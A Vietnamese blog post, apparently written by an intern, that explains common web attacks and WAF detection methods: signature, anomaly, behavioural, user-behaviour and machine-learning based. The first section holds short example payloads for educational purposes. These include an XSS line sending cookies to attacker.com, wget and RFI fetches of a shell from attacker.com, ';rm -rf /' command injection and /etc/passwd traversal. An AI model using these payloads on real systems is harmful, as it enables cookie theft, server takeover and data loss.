WAF [WAF A-02] Tìm hiểu cơ chế phát hiện tấn công WEB

thanhan1310 · 12/06/2025

Trong thời đại số hóa hiện nay, các ứng dụng web trở thành mục tiêu tấn công phổ biến của tin tặc, gây ra nhiều rủi ro nghiêm trọng về bảo mật và dữ liệu. Do đó, việc tìm hiểu cơ chế phát hiện tấn công web là bước quan trọng giúp các tổ chức chủ động bảo vệ hệ thống khỏi các mối đe dọa như SQL Injection, Cross-Site Scripting (XSS), hay tấn công DDoS. Bài viết này sẽ giúp bạn hiểu rõ hơn về các phương pháp, công nghệ và công cụ được sử dụng để phát hiện và ngăn chặn các cuộc tấn công trên nền tảng web hiện đại.

MỤC LỤC

Các loại tấn công web phổ biến
Các cơ chế phát hiện tấn công web
Kết luận

1/ Các loại tấn công web phổ biến

Trước khi nói về cơ chế phát hiện, cần hiểu các loại tấn công phổ biến:

1. SQL Injection (SQLi)

Chèn câu lệnh SQL vào đầu vào của ứng dụng.
Ví dụ :
- GET /login.php?user=admin'--&pass=abc
- Truy vấn bị chuyển thành: SELECT * FROM users WHERE username='admin'--' AND password='abc';
- ‘--' là ký hiệu comment trong SQL, khiến phần kiểm tra mật khẩu bị bỏ qua.

2. Cross-site Scripting (XSS)

Chèn mã JavaScript độc hại vào trang web.
Ví dụ :
- <script>document.location='http://attacker.com/steal?cookie='+document.cookie</script>
- Được chèn vào ô bình luận → người dùng khác truy cập sẽ bị đánh cắp cookie.

3. Remote Code Execution (RCE)

Thực thi mã trên máy chủ từ xa.
Ví dụ :
- http://example.com/run?cmd=ls;wget http://attacker.com/shell.sh
- → Nếu ứng dụng thực thi input trực tiếp trên shell → nguy cơ bị chiếm quyền máy chủ.

4. Cross-Site Request Forgery (CSRF)

Lừa người dùng đăng nhập gửi request trái phép tới web.
Ví dụ :
- Trang độc hại chứa đoạn: <img src="http://bank.com/transfer?to=attacker&amount=10000">
- Nếu nạn nhân đang đăng nhập ngân hàng, trình duyệt sẽ gửi request mà không cần xác nhận.

5. Directory Traversal

Truy cập file hệ thống nằm ngoài thư mục web cho phép.
Ví dụ :
- http://example.com/view?file=../../../../etc/passwd
- Truy xuất file nhạy cảm trên hệ thống.

6. Command Injection

Chèn lệnh hệ thống vào tham số để thực thi lệnh shell.
Ví dụ :
- http://example.com/ping?host=8.8.8.8;rm -rf /
- Nếu server thực thi, server có thể bị xóa dữ liệu

7. File Inclusion (LFI/RFI)

Tải file nội bộ (LFI) hoặc từ xa (RFI) vào ứng dụng để thực thi.
Ví dụ :
- http://site.com/index.php?page=../../../../etc/passwd
- Đọc file hệ thống (/etc/passwd)
- http://site.com/index.php?page=http://attacker.com/shell.txt
- Tải mã độc từ bên ngoài

2/ Các cơ chế phát hiện tấn công web

1. Cơ chế phát hiện dựa trên chữ ký (Signature-Based Detection)

Nguyên lý:
- So sánh nội dung các HTTP request/response với mẫu (signature) đã được định nghĩa trước cho các loại tấn công web.
- Signature có thể là một đoạn mã độc, từ khóa, biểu thức chính quy, hoặc chuỗi truy vấn cụ thể.
Ví dụ:
- HTTP request chứa: GET /index.php?id=1 UNION SELECT username, password FROM users
- Hệ thống phát hiện từ khóa <em>UNION SELECT</em> → tấn công SQL Injection
Ưu điểm:
- Hiệu quả cao với tấn công đã biết
- Thực thi nhanh, nhẹ, dễ hiểu
Nhược điểm:
- Không phát hiện được zero-day
- Dễ bị bypass bằng cách mã hóa, đổi định dạng chuỗi

2. Cơ chế phát hiện dựa trên bất thường (Anomaly-Based Detection)

Nguyên lý:
- Xây dựng mô hình hành vi "bình thường" của ứng dụng web.
- Nếu một HTTP request có đặc điểm vượt ra ngoài chuẩn bình thường, hệ thống sẽ coi là bất thường và cảnh báo.
Các đặc trưng có thể theo dõi:
- Độ dài bất thường của tham số.
- Số lượng request từ một IP trong thời gian ngắn.
- Header User-Agent lạ, hoặc method bất thường (DELETE, TRACE).
- Dữ liệu đầu vào chứa ký tự đặc biệt hoặc mã hóa bất thường.
Ví dụ:
- Một người dùng bình thường gửi 1 request/giây, nhưng có 1 IP gửi 50 request/giây với nội dung đầy ký tự "<script>", hệ thống sẽ coi là bất thường.
Ưu điểm:
- Có khả năng phát hiện tấn công mới, chưa biết
- Có thể tự điều chỉnh theo hệ thống cụ thể
Nhược điểm:
- Tỷ lệ false positive cao
- Cần thời gian và dữ liệu để học chính xác

3. Cơ chế phát hiện dựa trên hành vi lưu lượng HTTP (Behavioral-Based Detection)

Nguyên lý:
- Quan sát chuỗi hành động của người dùng hoặc bot trong phiên truy cập HTTP.
- Phân tích logic hành vi để phát hiện hoạt động đáng ngờ (ví dụ: tự động hóa, khai thác lỗ hổng theo kịch bản).
Ví dụ các hành vi nghi ngờ:
- Truy cập hàng loạt endpoint /admin, /config, /wp-login.php từ một địa chỉ IP trong vài giây.
- Gửi form liên tục kèm payload nghi vấn (XSS, SQLi).
- Hành vi truy cập giống bot (không dùng cookie, không load JavaScript, không tương tác với form thực).
Cơ chế sử dụng:
- Machine Learning / AI để nhận diện mô hình hành vi.
- Correlation engine để kết nối chuỗi hành vi trong phiên hoặc nhiều IP.
Ưu điểm:
- Phát hiện các hành vi nguy hiểm tinh vi
- Giảm thiểu tấn công tự động, spam, bot
Nhược điểm:
- Khó định nghĩa "bình thường" cho mọi ứng dụng
- Phải xử lý lưu lượng lớn → tốn tài nguyên

4. Phân tích hành vi người dùng (User Behavior Analytics – UBA)

Nguyên lý:
- Xây dựng hồ sơ hành vi cho từng người dùng: IP, thời gian truy cập, thao tác, địa lý, thiết bị
- Phát hiện hành vi bất thường như:
- Truy cập từ thiết bị lạ
- Truy cập file nhạy cảm ngoài giờ
Ví dụ:
- Nhân viên thường truy cập từ Hà Nội, giờ làm việc từ 8h–17h
- Đột nhiên có truy cập từ nước ngoài lúc 2h sáng → nghi ngờ tài khoản bị chiếm quyền
Cơ chế sử dụng:
- Triển khai trong các công cụ SIEM, giải pháp bảo mật doanh nghiệp (UEBA)
- Kết hợp với các hệ thống IAM (Identity Access Management)
Ưu điểm:
- Phát hiện được tấn công từ bên trong (insider threat)
- Hiệu quả với APT (Advanced Persistent Threat)
Nhược điểm:
- Cần dữ liệu lịch sử lâu dài để phân tích
- Có thể gây ra cảnh báo sai nếu người dùng thay đổi hành vi

5. Phân tích dựa trên học máy (Machine Learning-Based Detection)

Nguyên lý:
- Trích xuất các đặc trưng (features) từ request HTTP như:
- Entropy, độ dài, từ khóa, URL path, tần suất request
- Sử dụng mô hình ML như:
  - Supervised learning (phân loại)
  - Unsupervised learning (phát hiện bất thường)
Ví dụ:
- Huấn luyện mô hình để phân loại giữa các request bình thường và độc hại
- Mỗi request được mô tả bởi tập đặc trưng: [method=POST, URL=/login, entropy=high,…]
Cơ chế sử dụng:
- Triển khai trong các hệ thống WAF thông minh (Cloudflare, AWS WAF AI, Imperva,…)
- Kết hợp log HTTP với hệ thống phân tích dữ liệu (Spark, Hadoop,…)
Ưu điểm:
- Khả năng phát hiện tấn công mới
- Có thể phân tích khối lượng dữ liệu lớn
Nhược điểm:
- Cần dữ liệu đào tạo chất lượng
- Phức tạp trong huấn luyện, tối ưu mô hình
- Khó giải thích (interpretability thấp)

3/ Kết luận

Việc hiểu rõ cơ chế phát hiện tấn công web không chỉ giúp nâng cao khả năng phòng thủ cho hệ thống mà còn là nền tảng để xây dựng các giải pháp bảo mật hiệu quả và bền vững. Trong bối cảnh các hình thức tấn công ngày càng tinh vi, việc kết hợp giữa các công nghệ hiện đại như trí tuệ nhân tạo, machine learning cùng với các công cụ giám sát, phân tích lưu lượng là xu hướng tất yếu. Bảo mật web không phải là nhiệm vụ một lần, mà là quá trình liên tục đòi hỏi sự chủ động, cập nhật và thích nghi với những mối đe dọa mới mỗi ngày.

WAF [WAF A-02] Tìm hiểu cơ chế phát hiện tấn công WEB

thanhan1310

Intern

1/ Các loại tấn công web phổ biến​

1. SQL Injection (SQLi)​

2. Cross-site Scripting (XSS)​

3. Remote Code Execution (RCE)​

4. Cross-Site Request Forgery (CSRF)​

5. Directory Traversal​

6. Command Injection​

7. File Inclusion (LFI/RFI)​

2/ Các cơ chế phát hiện tấn công web​

1. Cơ chế phát hiện dựa trên chữ ký (Signature-Based Detection)​

2. Cơ chế phát hiện dựa trên bất thường (Anomaly-Based Detection)​

3. Cơ chế phát hiện dựa trên hành vi lưu lượng HTTP (Behavioral-Based Detection)​

4. Phân tích hành vi người dùng (User Behavior Analytics – UBA)​

5. Phân tích dựa trên học máy (Machine Learning-Based Detection)​

3/ Kết luận​